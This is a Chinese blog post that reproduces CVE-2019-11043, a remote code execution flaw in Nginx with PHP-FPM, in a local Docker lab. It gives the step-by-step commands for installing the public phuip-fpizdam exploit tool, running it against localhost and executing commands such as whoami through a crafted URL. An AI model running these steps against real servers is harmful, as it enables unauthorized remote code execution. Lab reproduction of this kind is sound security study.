CVE-2019-11043 远程代码执行漏洞复现

水下月 2021-01-27
Web安全 发布于 2021-01-27 18:02:40 阅读 106 评论 0

漏洞原因:

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO
为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。

影响范围:

在2019-09-26更新之前下载的PHP-FPM,且必须为Nginx + php-fpm 的服务器使用如下配置,会受到影响。

漏洞复现:

前提在阿里云端用docker 搭建漏洞环境
docker ps 列出所有在运行的容器信息

1,准备工具。phuip-fpizdam是检测漏洞的工具
下载phuip-fpizdam
git clone https://github.com/neex/phuip-fpizdam

2, 进入到下载好的phuip-fpizdam目录中,看看有没有文件。需要安装go语言。

3,安装go语言
apt install golang-go 安装go
go version 查看go版本


4,安装phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam

5,浏览器上访问使用vulhub搭建的站点

6,启动工具phuip-fpizdam
cd go/bin 2

7,检验漏洞是否存在
./phuip-fpizdam 127.0.0.1:8080/index.php

8,漏洞利用,也可将whoami换成其他命令。
curl “http://127.0.0.1:8080/index.php?a=whoami"

远程代码执行漏洞 https 漏洞 large
本作品采用《CC 协议》,转载必须注明作者和本文链接
水下月
36 声望
暂无个人描述~
讨论数量: 0
排序:
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
支持 MD 帮助
水下月
未填写
  • 作者发布文章15
  • 作者收获粉丝0
  • 作者收到点赞5
  • 所有文章被收藏了0
  • 博客总访问量排行第10
  • 博客总访问量2968(每日更新)
文章归档
7 2021 年 2 月
6 2021 年 1 月
2 2020 年 11 月
查看所有博文
最新 最受欢迎
Nginx 越界读取缓存漏洞复现(CVE-2017-7529) [3天前]
nginx 文件名逻辑漏洞复现(CVE-2013-4547) [3天前]
MySQL 身份认证绕过漏洞(CVE-2012-2122)复现 [5天前]
flask-ssti 漏洞复现 [1周前]
Shellshock 破壳漏洞 CVE-2014-6271 复现 [1周前]
Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现 1
cve-2017-12149 JBOOS 反序列化漏洞复现 1
CVE-2014-0160 心脏滴血漏洞复现 1
身份认证绕过漏洞复现 CVE-2012-2122 1
CVE-2019-11043 远程代码执行漏洞复现 1
© 2021 WANGAN.COM 帮助网安从业者成长;关注产业发展,做网络安全忠诚卫士!